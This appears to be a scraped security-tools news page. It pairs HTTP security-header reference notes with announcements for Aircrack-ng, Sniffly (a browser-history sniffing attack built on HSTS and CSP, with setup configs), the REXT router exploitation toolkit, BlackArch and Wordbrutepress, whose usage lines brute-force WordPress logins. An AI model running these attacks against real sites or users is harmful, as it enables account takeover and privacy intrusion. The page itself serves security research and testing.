Reference: https://tools.ietf.org/html/rfc7469
Security Description: HTTP Public Key Pinning (HPKP) is a trust on first use security mechanism which protects HTTPS websites from impersonation using fraudulent certificates issued by compromised certificate authorities. The security context or pinset data is supplied by the site or origin.
Security Reference: https://tools.ietf.org/html/rfc7469
Recommendations: Deploying Public Key Pinning (PKP) safely will require operational and organizational maturity due to the risk that hosts may make themselves unavailable by pinning to a set of SPKIs that becomes invalid. With care, host operators can greatly reduce the risk of man-in-the-middle (MITM) attacks and other false- authentication problems for their users without incurring undue risk. PKP is meant to be used together with HTTP Strict Transport Security (HSTS) [RFC6797], but it is possible to pin keys without requiring HSTS.
CWE: CWE-295: Improper Certificate Validation
CWE URL: https://cwe.mitre.org/data/definitions/295.html

Header Field Name: Public-Key-Pins-Report-Only
Reference: https://tools.ietf.org/html/rfc7469
Security Description: HTTP Public Key Pinning (HPKP) is a trust on first use security mechanism which protects HTTPS websites from impersonation using fraudulent certificates issued by compromised certificate authorities. The security context or pinset data is supplied by the site or origin.
Security Reference: https://tools.ietf.org/html/rfc7469
Recommendations: Deploying Public Key Pinning (PKP) safely will require operational and organizational maturity due to the risk that hosts may make themselves unavailable by pinning to a set of SPKIs that becomes invalid. With care, host operators can greatly reduce the risk of man-in-the-middle (MITM) attacks and other false- authentication problems for their users without incurring undue risk. PKP is meant to be used together with HTTP Strict Transport Security (HSTS) [RFC6797], but it is possible to pin keys without requiring HSTS.
CWE: CWE-295: Improper Certificate Validation
CWE URL: https://cwe.mitre.org/data/definitions/295.html

Header Field Name: Strict-Transport-Security
Reference: https://tools.ietf.org/html/rfc6797
Security Description: HTTP Strict Transport Security (HSTS) is a web security policy mechanism which helps to protect secure HTTPS websites against downgrade attacks and cookie hijacking. It allows web servers to declare that web browsers (or other complying user agents) should only interact with it using secure HTTPS connections, and never via the insecure HTTP protocol. HSTS is an IETF standards track protocol and is specified in RFC 6797.
Security Reference: https://tools.ietf.org/html/rfc6797
Recommendations: Please at least read this reference: https://www.owasp.org/index.php/HTTP_Strict_Transport_Security.
CWE: CWE-311: Missing Encryption of Sensitive Data
CWE URL: https://cwe.mitre.org/data/definitions/311.html

Header Field Name: Frame-Options
Reference: https://tools.ietf.org/html/rfc7034
Security Description: The use of "X-Frame-Options" allows a web page from host B to declare that its content (for example, a button, links, text, etc.) must not be displayed in a frame (<frame> or <iframe>) of another page (e.g., from host A). This is done by a policy declared in the HTTP header and enforced by browser implementations.
Security Reference: https://tools.ietf.org/html/rfc7034
Recommendations: In 2009 and 2010, many browser vendors ([Microsoft-X-Frame-Options] and [Mozilla-X-Frame-Options]) introduced the use of a non-standard HTTP [RFC2616] header field "X-Frame-Options" to protect against clickjacking. Please check here https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet what's the best option for your case.
CWE: CWE-693: Protection Mechanism Failure
CWE URL: https://cwe.mitre.org/data/definitions/693.html

Header Field Name: X-Content-Type-Options
Reference: http://blogs.msdn.com/b/ie/archive/2008/09/02/ie8-security-part-vi-beta-2-update.aspx
Security Description: The only defined value, "nosniff", prevents Internet Explorer and Google Chrome from MIME-sniffing a response away from the declared content-type. This also applies to Google Chrome, when downloading extensions. This reduces exposure to drive-by download attacks and sites serving user uploaded content that, by clever naming, could be treated by MSIE as executable or dynamic HTML files.
Security Reference: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
Recommendations: Always use the only defined value, "nosniff".
CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html

Header Field Name: Content-Security-Policy
Reference: http://www.w3.org/TR/CSP/
Security Description: Content Security Policy requires careful tuning and precise definition of the policy. If enabled, CSP has significant impact on the way browser renders pages (e.g., inline JavaScript disabled by default and must be explicitly allowed in policy). CSP prevents a wide range of attacks, including Cross-site scripting and other cross-site injections.
Security Reference: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
Recommendations: Read the reference http://www.w3.org/TR/CSP/ and set according to your case. This is not a easy job.
CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html

Header Field Name: X-Content-Security-Policy
Reference: http://www.w3.org/TR/CSP/
Security Description: Content Security Policy requires careful tuning and precise definition of the policy. If enabled, CSP has significant impact on the way browser renders pages (e.g., inline JavaScript disabled by default and must be explicitly allowed in policy). CSP prevents a wide range of attacks, including Cross-site scripting and other cross-site injections.
Security Reference: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
Recommendations: Read the reference http://www.w3.org/TR/CSP/ and set according to your case. This is not a easy job.
CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html

Header Field Name: X-WebKit-CSP
Reference: http://www.w3.org/TR/CSP/
Security Description: Content Security Policy requires careful tuning and precise definition of the policy. If enabled, CSP has significant impact on the way browser renders pages (e.g., inline JavaScript disabled by default and must be explicitly allowed in policy). CSP prevents a wide range of attacks, including Cross-site scripting and other cross-site injections.
Security Reference: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
Recommendations: Read the reference http://www.w3.org/TR/CSP/ and set according to your case. This is not a easy job.
CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html

Header Field Name: Content-Security-Policy-Report-Only
Reference: http://www.w3.org/TR/CSP/
Security Description: Like Content-Security-Policy, but only reports. Useful during implementation, tuning and testing efforts.
Security Reference: https://www.owasp.org/index.php/List_of_useful_HTTP_headers
Recommendations: Read the reference http://www.w3.org/TR/CSP/ and set according to your case. This is not a easy job.
CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CWE URL: https://cwe.mitre.org/data/definitions/79.html

Aircrack-ng 1.2 RC 3 - WEP and WPA-PSK Keys Cracking Program


Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the PTW attack, thus making the attack much faster compared to other WEP cracking tools.

Third release candidate and hopefully this should be the last one. It contains a ton of bug fixes, code cleanup, improvements and compilation fixes everywhere. Some features were added: AppArmor profiles, better FreeBSD support, including an airmon-ng for FreeBSD.

Aircrack-ng Changelog

Version 1.2-rc3 (changes from aircrack-ng 1.2-rc2) - Released 21 Nov 2015:
  • Airodump-ng: Prevent sending signal to init which caused the system to reboot/shutdown.
  • Airbase-ng: Allow to use a user-specified ANonce instead of a randomized one when doing the 4-way handshake
  • Aircrack-ng: Fixed compilation warnings.
  • Aircrack-ng: Removed redundant NULL check and fixed typo in another one.
  • Aircrack-ng: Workaround for segfault when compiling aircrack-ng with clang and gcrypt and running a check.
  • Airmon-ng: Created version for FreeBSD.
  • Airmon-ng: Prevent passing invalid values as channel.
  • Airmon-ng: Handle udev renaming interfaces.
  • Airmon-ng: Better handling of rfkill.
  • Airmon-ng: Updated OUI URL.
  • Airmon-ng: Fix VM detection.
  • Airmon-ng: Make lsusb optional if there doesn't seem to be a usb bus. Improve pci detection slightly.
  • Airmon-ng: Various cleanup and fixes (including wording and typos).
  • Airmon-ng: Display iw errors.
  • Airmon-ng: Improved handling of non-monitor interfaces.
  • Airmon-ng: Fixed error when running 'check kill'.
  • Airdrop-ng: Display error instead of stack trace.
  • Airmon-ng: Fixed bashism.
  • Airdecap-ng: Allow specifying output file names.
  • Airtun-ng: Added missing parameter to help screen.
  • Besside-ng-crawler: Removed reference to darkircop.org (non-existent subdomain).
  • Airgraph-ng: Display error when no graph type is specified.
  • Airgraph-ng: Fixed make install.
  • Manpages: Fixed, updated and improved airodump-ng, airmon-ng, aircrack-ng, airbase-ng and aireplay-ng manpages.
  • Aircrack-ng GUI: Fixes issues with wordlists selection.
  • OSdep: Add missing RADIOTAP_SUPPORT_OVERRIDES check.
  • OSdep: Fix possible infinite loop.
  • OSdep: Use a default MTU of 1500 (Linux only).
  • OSdep: Fixed compilation on OSX.
  • AppArmor: Improved and added profiles.
  • General: Fixed warnings reported by clang.
  • General: Updated TravisCI configuration file
  • General: Fixed typos in various tools.
  • General: Fixed clang warning about 'gcry_thread_cbs()' being deprecated with gcrypt > 1.6.0.
  • General: Fixed compilation on cygwin due to undefined reference to GUID_DEVCLASS_NET
  • General: Fixed compilation with musl libc.
  • General: Improved testing and added test cases (make check).
  • General: Improved mutexes handling in various tools.
  • General: Fixed memory leaks, use afer free, null termination and return values in various tools and OSdep.
  • General: Fixed compilation on FreeBSD.
  • General: Various fixes and improvements to README (wording, compilation, etc).
  • General: Updated copyrights in help screen.

UserProfilesView - View User Profiles Information On Your Windows


UserProfilesView displays the list of all user profiles that you currently have in your system. For each user profile, the following information is displayed: Domain\User Name, Profile Path, Last Load Time, Registry File Size, User SID, and more. You can save the profiles list into text/xml/html/csv file.

Versions History
  • Version 1.10
    • Added 'Run As Administrator' option (Ctrl+F11)
    • Added 'Registry Loaded' column (Yes/No), which specifies whether the Registry key of the user is loaded into HKEY_USERS key.
    • Added 'Logon Time' column, which specifies the logon time of the current logged on user.
    • UserProfilesView now displays the system users that it failed to get in previous versions.
  • Version 1.01 - Added command-line options for sorting.
  • Version 1.00 - First release.

System Requirements

This utility works with any version of Windows, starting from Windows 2000, and up to Windows 10.

Using UserProfilesView

UserProfilesView doesn't require any installation process or additional dll files. In order to start using it, simply run the executable file - UserProfilesView.exe
After running it, the main window will display the all of all user profiles. You can select one or more items, and then save the list into xml/html/csv/xml file.

Command-Line Options

/stext <Filename> Save the list of all profiles into a regular text file.
/stab <Filename> Save the list of all profiles into a tab-delimited text file.
/scomma <Filename> Save the list of all profiles into a comma-delimited text file.
/stabular <Filename> Save the list of all profiles into a tabular text file.
/shtml <Filename> Save the list of all profiles into HTML file (Horizontal).
/sverhtml <Filename> Save the list of all profiles into HTML file (Vertical).
/sxml <Filename> Save the list of all profiles to XML file.
/sort <column> This command-line option can be used with other save options for sorting by the desired column. If you don't specify this option, the list is sorted according to the last sort that you made from the user interface. The <column> parameter can specify the column index (0 for the first column, 1 for the second column, and so on) or the name of the column, like "Profile Path" and "User Name". You can specify the '~' prefix character (e.g: "~Last Load Time") if you want to sort in descending order. You can put multiple /sort in the command-line if you want to sort by multiple columns. Examples:
UserProfilesView.exe.exe /shtml "f:\temp\profiles.html" /sort 2 /sort ~1
UserProfilesView.exe.exe /shtml "f:\temp\profiles.html" /sort "User Name"
/nosort When you specify this command-line option, the list will be saved without any sorting.      

Sniffly - Sniffing Browser History Using HSTS + CSP.


Sniffly is an attack that abuses HTTP Strict Transport Security and Content Security Policy to allow arbitrary websites to sniff a user's browsing history. It has been tested in Firefox and Chrome.
More info available in my ToorCon 2015 slides: https://zyan.scripts.mit.edu/presentations/toorcon2015.pdf .

Visit http://zyan.scripts.mit.edu/sniffly/ in Firefox/Chrome/Opera with HTTPS Everywhere disabled. If you use an ad blocker, a bunch of advertising domains will probably show up in the "Probably Visited" column (ignore them).

How it works
I recommend reading the inline comments in src/index.js to understand how Sniffly does a timing attack in both FF and Chrome without polluting the local HSTS store. tl;dr version:
  1. User visits Sniffly page
  2. Browser attempts to load images from various HSTS domains over HTTP
  3. Sniffly sets a CSP policy that restricts images to HTTP, so image sources are blocked before they are redirected to HTTPS. This is crucial! If the browser completes a request to the HTTPS site, then it will receive the HSTS pin, and the attack will no longer work when the user visits Sniffly.
  4. When an image gets blocked by CSP, its onerror handler is called. In this case, the onerror handler does some fancy tricks to time how long it took for the image to be redirected from HTTP to HTTPS. If this time is on the order of a millisecond, it was an HSTS redirect (no network request was made), which means the user has visited the image's domain before. If it's on the order of 100 milliseconds, then a network request probably occurred, meaning that the user hasn't visited the image's domain.

Finding HSTS hosts
To scrape an included list of sites ( util/strict-transport-security.txt , courtesy Scott Helme) to determine which hosts send HSTS headers, do:
$ cd util
$ ./run.sh <number_of_batches> > results.log
where 1 batch is 100 sites. You can override util/strict-transport-security.txt with a different list, such as the full Alexa Top 1M, if you want.
To process and sort the results by max-age, excluding ones with max-age less than 1 day and ones that are preloaded:
$ cd util
$ ./process.py <results_file> > processed.log
Once that's done, you can copy the hosts from processed.log into src/index.js .

Running sploitz
Visiting file:///path/to/sniffly/src/index.html in Chrome should just work. In Firefox, CSP headers using the tag are apparently not supported yet, so you need to set up a local webserver to serve the CSP HTTP response header. My Nginx server block looks something like this:
server {
listen 8081;
server_name localhost;
location / {
root /path/to/sniffly/src;
add_header Content-Security-Policy "img-src http:";
index index.html;
Or in .htaccess :
<IfModule mod_headers.c>
Header set Content-Security-Policy "img-src http:"
Or send the header via php .
Paste this at the start of the script (and change the name to index.php):
$csp_rules = "img-src http:";
// Just to ensure maximum compatibility
header('X-WebKit-CSP: '.$csp_rules);
header('X-Content-Security-Policy: '.$csp_rules);
header('Content-Security-Policy: '.$csp_rules);

  • Not supported yet in Safari, IE, or Chrome on iOS.
  • Extensions such as HTTPS Everywhere will mess up results.
  • Doesn't work reliably in Tor Browser since timings are rounded to the nearest 100-millisecond.
  • Users with a different HSTS preload list (ex: due to having an older browser) may not see accurate results.

  • Scott Helme for an initial list of HSTS hosts that he had found so I didn't have to scan the entire Alexa 1M.
  • Chris Palmer for advising on how to file a privacy bug in Chrome.
  • Dan Kaminsky and WhiteOps for sponsoring the ToorCon trip where this was presented.
  • Jan Schaumann and Chris Rohlf for being early testers.
  • Everyone who let me sleep on their couch while I did this over my "vacation break". You know who you are!

REXT - Router Exploitation Toolkit

Small toolkit for easy creation and usage of various python scripts that work with embedded devices.
  • core - contains most of toolkits basic functions
  • databases - contains databases, like default credentials etc.
  • interface - contains code that is being used for the creation and manipulation with interface
  • modules - contains structure of modules, that can be loaded, every module contains vendor specific sub-modules where scripts are stored.
    • decryptors
    • exploits
    • harvesters
    • misc
    • scanners
  • output - output goes here
This is still heavy work-in progress

I am trying to keep the requirements minimal:
  • requests

BlackArch Linux v2015.11.24 - Penetration Testing Distribution


BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. The repository contains 1308 tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.

The BlackArch Live ISO contains multiple window managers.

ChangeLog v2015.11.24:
  • added more than 100 new tools
  • updated system packages
  • include linux kernel 4.2.5
  • updated all tools
  • updated menu entries for window managers
  • added (correct) multilib support
  • added more fonts
  • added missing group 'vboxsf'

Bohatei - Flexible and Elastic DDoS Defense


Bohatei is a first of its kind platform that enables flexible and elastic DDoS defense using SDN and NFV.

The repository contains a first version of the components described in the Bohatei paper, as well as a web-based User Interface. The backend folder consists of :
  • an implementation of the FlowTags framework for the OpenDaylight controller
  • an implementation of the resource management algorithms
  • a topology file that was used to simulate an ISP topology
  • scripts that facilitate functions such as spawning, tearing down and retrieving the topology.
  • scripts that automate and coordinate the components required for the usecases examined.
The frontend folder contains the required files for the web interface.
For the experiments performed, we used a set of VM images that contain implementations of the strategy graphs for each type of attack (SYN Flood, UDP Flood, DNS Amplification and Elephant Flow). Those images will become available at a later stage. The tools that were used for those strategy graphs are the following:

Wordbrutepress - Wordpress Brute Force Multithreading with Standard and XML-RPC Login Method

Wordpress Brute Force Multithreading with standard and xml-rpc login method written in python.

  1. Multithreading
  2. xml-rpc brute force mode
  3. http and https protocols support
  4. Random User Agent
  5. Big wordlist support

Standard login request:

python wordbrutepress.py -S -t http[s]://target.com[:port] -u username -w wordlist [--timeout in sec]

Xml-rpc login request:

python wordbrutepress.py -X -t http[s]://target.com[:port] -u username -w wordlist [--timeout in sec]

 2015-11-20 v2.1
1) Add new feature: Big wordlist support (thanks to guly @theguly)
2) Fix faultcode check instead of "403" code for XML-RPC (thanks to guly @theguly)

2015-04-12 v2.0
1) Add new feature: xml-rpc brute force mode
2) Fix minor bugs

2015-04-11 v1.1
1) optparse (Deprecated since version 2.7) replaced by argparse
2) Fix connection bugs

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